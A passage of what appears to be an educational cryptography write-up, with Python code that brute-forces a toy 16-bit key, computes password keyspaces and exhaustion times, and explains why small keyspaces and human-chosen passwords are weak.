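        key = k.to_bytes(nbytes, "big")
        if decrypt(key, ciphertext).startswith(crib):
            return key
    return None


def password_keyspace(charset_size, length):
    """Table 10-1 style 'password power': number of distinct passwords of this length over this alphabet."""
    return charset_size ** length


def time_to_exhaust(space, guesses_per_second):
    """Worst-case seconds to try the whole space (the expected time is half of this)."""
    return space / guesses_per_second


def demo():
    key = (0x1A2B).to_bytes(2, "big")                     # constructed 16-bit key
    ct = encrypt(key, b"ATTACK AT DAWN")
    recovered = brute_force(ct, 16, b"ATTACK")
    return {
        "recovered_key": recovered,
        "seconds_16bit_at_1M_per_s": time_to_exhaust(2 ** 16, 1e6),
        "years_128bit_at_1T_per_s": time_to_exhaust(2 ** 128, 1e12) / (365 * 24 * 3600),
        "passwords_8_lower": password_keyspace(26, 8),
        "passwords_8_mixed_digits_symbols": password_keyspace(26 + 26 + 10 + 32, 8),
    }
```

The same search that recovers a 16-bit key instantly takes on the order of 10^19 years for 128 bits at a trillion guesses per second, which is the whole argument of "Choosing Key Sizes for Cryptography": a strong algorithm with a small keyspace is not strong. For passwords the alphabet and length play the role of the key size, with the difference that people pick from a far smaller effective space than the arithmetic suggests, which is why dictionary attacks beat exhaustive search against them.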




Cryptography Article

Choosing Key Sizes for Cryptography